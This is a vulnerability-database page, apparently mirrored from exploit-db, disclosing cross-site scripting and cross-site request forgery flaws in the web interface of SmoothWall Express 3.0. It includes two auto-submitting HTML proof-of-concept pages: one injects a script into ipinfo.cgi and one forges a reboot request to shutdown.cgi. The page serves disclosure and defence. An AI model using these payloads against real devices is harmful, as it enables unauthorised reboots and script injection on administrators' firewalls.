Lucene search
+L

SmoothWall Express 3.0 - Multiple Vulnerabilities

🗓️ 17 Jan 2011 00:00:00Reported by dave bType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

SmoothWall Express 3.0 web interface vulnerabilities, xss and csr

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2011-5283
31 Dec 201422:00
cve
cve
CVE
CVE-2011-5284
31 Dec 201422:00
cve
cvelist
Cvelist
CVE-2011-5283
31 Dec 201422:00
cvelist
cvelist
Cvelist
CVE-2011-5284
31 Dec 201422:00
cvelist
euvd
EUVD
EUVD-2011-5182
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2011-5183
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-5283
31 Dec 201422:59
nvd
nvd
NVD
CVE-2011-5284
31 Dec 201422:59
nvd
prion
Prion
Cross site scripting
31 Dec 201422:59
prion
prion
Prion
Cross site request forgery (csrf)
31 Dec 201422:59
prion
The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
        <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>


csrf example:

<html>
<title>  SmoothWall Express 3.0 csrf </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jan 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.03217
45